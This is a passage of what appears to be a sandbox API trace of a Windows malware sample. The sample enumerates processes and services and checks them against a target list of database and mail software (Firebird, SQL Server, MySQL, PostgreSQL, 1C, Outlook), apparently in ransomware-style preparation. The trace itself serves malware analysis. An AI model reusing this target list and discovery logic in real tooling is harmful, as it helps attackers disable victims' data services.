lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0242.678] lstrlenW (lpString="dwm.exe") returned 7 [0242.678] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0242.678] lstrlenW (lpString="explorer.exe") returned 12 [0242.678] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0242.679] lstrlenW (lpString="spoolsv.exe") returned 11 [0242.679] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0242.679] lstrlenW (lpString="taskhost.exe") returned 12 [0242.679] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.679] lstrlenW (lpString="svchost.exe") returned 11 [0242.679] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0242.679] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0242.679] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0242.680] lstrlenW (lpString="reader_sl.exe") returned 13 [0242.680] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0242.680] lstrlenW (lpString="cmd.exe") returned 7 [0242.680] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x18c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0242.680] lstrlenW (lpString="conhost.exe") returned 11 [0242.680] Process32NextW (in: hSnapshot=0x240, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x18c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0242.680] CloseHandle (hObject=0x240) returned 1 [0242.681] Sleep (dwMilliseconds=0x1f4) [0243.328] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea178 [0243.351] EnumServicesStatusExW (in: hSCManager=0x47ea178, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0243.352] GetLastError () returned 0xea [0243.352] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xb38) returned 0x484d080 [0243.352] EnumServicesStatusExW (in: hSCManager=0x47ea178, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x484d080, cbBufSize=0xb38, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x484d080, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0243.353] GetLastError () returned 0xea [0243.353] RtlReAllocateHeap (Heap=0xb00000, Flags=0x0, Ptr=0x484d080, Size=0xbbe) returned 0x484d080 [0243.353] EnumServicesStatusExW (in: hSCManager=0x47ea178, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x484d080, cbBufSize=0xbbe, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x484d080, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0243.353] CloseServiceHandle (hSCObject=0x47ea178) returned 1 [0243.353] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0243.353] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0243.353] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0243.353] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0243.353] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0243.353] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0243.353] lstrlenW (lpString="AudioSrv") returned 8 [0243.354] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0243.354] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0243.354] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0243.354] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0243.354] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0243.354] lstrlenW (lpString="BFE") returned 3 [0243.354] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0243.354] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0243.354] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0243.354] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0243.354] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0243.354] lstrlenW (lpString="CryptSvc") returned 8 [0243.354] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0243.354] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0243.354] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0243.354] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0243.354] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0243.354] lstrlenW (lpString="CscService") returned 10 [0243.354] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0243.354] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0243.354] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0243.354] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0243.354] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0243.354] lstrlenW (lpString="DcomLaunch") returned 10 [0243.354] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0243.354] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0243.354] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0243.354] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0243.355] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0243.355] lstrlenW (lpString="Dhcp") returned 4 [0243.355] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0243.355] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0243.355] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0243.355] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0243.355] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0243.355] lstrlenW (lpString="Dnscache") returned 8 [0243.355] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0243.355] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0243.355] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0243.355] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0243.355] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0243.355] lstrlenW (lpString="DPS") returned 3 [0243.355] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0243.355] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0243.355] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0243.355] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0243.355] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0243.355] lstrlenW (lpString="eventlog") returned 8 [0243.355] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0243.355] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0243.355] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0243.355] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0243.355] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0243.355] lstrlenW (lpString="EventSystem") returned 11 [0243.355] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0243.355] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0243.355] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0243.356] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0243.356] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0243.356] lstrlenW (lpString="gpsvc") returned 5 [0243.356] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0243.356] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0243.356] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0243.356] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0243.356] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0243.356] lstrlenW (lpString="LanmanWorkstation") returned 17 [0243.356] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0243.356] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0243.356] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0243.356] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0243.356] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0243.356] lstrlenW (lpString="lmhosts") returned 7 [0243.356] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0243.356] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0243.356] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0243.356] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0243.356] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0243.356] lstrlenW (lpString="MMCSS") returned 5 [0243.356] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0243.356] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0243.356] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0243.356] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0243.356] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0243.356] lstrlenW (lpString="MpsSvc") returned 6 [0243.356] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0243.356] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0243.357] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0243.357] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0243.357] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0243.357] lstrlenW (lpString="nsi") returned 3 [0243.357] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0243.357] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0243.357] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0243.357] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0243.357] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0243.357] lstrlenW (lpString="PlugPlay") returned 8 [0243.357] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0243.357] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0243.357] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0243.357] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0243.357] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0243.357] lstrlenW (lpString="Power") returned 5 [0243.357] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0243.357] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0243.357] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0243.357] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0243.357] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0243.357] lstrlenW (lpString="ProfSvc") returned 7 [0243.357] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0243.357] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0243.357] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0243.357] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0243.357] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0243.357] lstrlenW (lpString="RpcEptMapper") returned 12 [0243.357] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0243.358] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0243.358] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0243.358] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0243.358] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0243.358] lstrlenW (lpString="RpcSs") returned 5 [0243.358] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0243.358] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0243.358] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0243.358] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0243.358] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0243.358] lstrlenW (lpString="SamSs") returned 5 [0243.358] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0243.358] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0243.358] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0243.358] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0243.358] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0243.358] lstrlenW (lpString="Schedule") returned 8 [0243.358] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0243.358] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0243.358] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0243.358] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0243.358] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0243.358] lstrlenW (lpString="SENS") returned 4 [0243.358] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0243.358] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0243.358] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0243.358] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0243.358] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0243.359] lstrlenW (lpString="ShellHWDetection") returned 16 [0243.359] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0243.359] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0243.359] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0243.359] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0243.359] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0243.359] lstrlenW (lpString="Spooler") returned 7 [0243.359] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0243.359] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0243.359] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0243.359] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0243.359] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0243.359] lstrlenW (lpString="Themes") returned 6 [0243.359] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0243.359] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0243.359] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0243.359] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0243.359] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0243.359] lstrlenW (lpString="UxSms") returned 5 [0243.359] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0243.359] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0243.359] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0243.359] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0243.359] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0243.359] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x484d080 | out: hHeap=0xb00000) returned 1 [0243.359] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x380 [0243.360] Process32FirstW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.360] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0243.361] lstrlenW (lpString="System") returned 6 [0243.361] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0243.361] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0243.361] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0243.361] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0243.361] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0243.361] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0243.361] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0243.361] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0243.361] lstrlenW (lpString="smss.exe") returned 8 [0243.361] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0243.361] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0243.361] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0243.361] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0243.361] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0243.361] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0243.361] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0243.362] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0243.362] lstrlenW (lpString="csrss.exe") returned 9 [0243.362] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0243.362] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0243.362] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0243.362] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0243.362] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0243.362] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0243.362] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0243.362] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0243.362] lstrlenW (lpString="wininit.exe") returned 11 [0243.362] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0243.363] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0243.363] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0243.363] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0243.363] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0243.363] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0243.363] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0243.363] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0243.363] lstrlenW (lpString="csrss.exe") returned 9 [0243.363] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0243.363] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0243.363] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0243.363] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0243.363] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0243.363] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0243.363] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0243.363] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0243.363] lstrlenW (lpString="winlogon.exe") returned 12 [0243.363] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0243.364] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0243.364] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0243.364] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0243.364] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0243.364] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0243.364] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0243.364] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0243.364] lstrlenW (lpString="services.exe") returned 12 [0243.364] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0243.364] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0243.364] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0243.364] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0243.364] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0243.364] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0243.364] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0243.364] Process32NextW (in: hSnapshot=0x380, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0243.364] lstrlenW (lpString="lsass.exe") returned 9 [0243.365] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0243.365] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0243.365] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0243.365] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0243.365] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0243.365] 